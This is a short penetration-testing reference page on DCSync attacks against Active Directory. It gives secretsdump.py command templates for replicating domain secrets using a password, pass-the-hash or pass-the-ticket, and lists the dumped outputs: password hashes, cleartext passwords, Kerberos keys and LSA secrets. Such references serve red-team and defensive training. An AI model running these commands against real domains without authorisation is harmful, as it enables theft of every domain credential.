# DCSync

## Overview

A DCSync is similar to dumping a NTDS.dit file. However, rather than copying and extracting data from NTDS.dit, DCSync uses Windows APIs with the domain controller to replicate the domains data.

To conduct this account, a domain administrator is requried or a user with the privileges: `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`. 

## Remotely performing a DCSync

The easiest way to perform a DCSync is to use secretsdump.

secretsdump.py performs various techniques to dump password hashes and secrets. 

* <https://github.com/fortra/impacket/blob/master/examples/secretsdump.py>

**DCSync using a plaintext password**

`secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>`

**DCSync using Pass-the-Hash**

`secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>`

**DCSync using Pass-the-Ticket**

`secretsdump -k -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>`

## secretsdump output

The secretsdump script will output the following files from the DCSync:

* .ntds
  * LM and NT password hashes which can be used with hash cracking.
* .cleartext
  * Passwords stored using reversible encryption
* .kerberos
  * Kerberos keys (DES, AES128 and AES256)
* .sam
  * Domain controller's SAM secrets
* .secrets
  * Domain controller's LSA secrets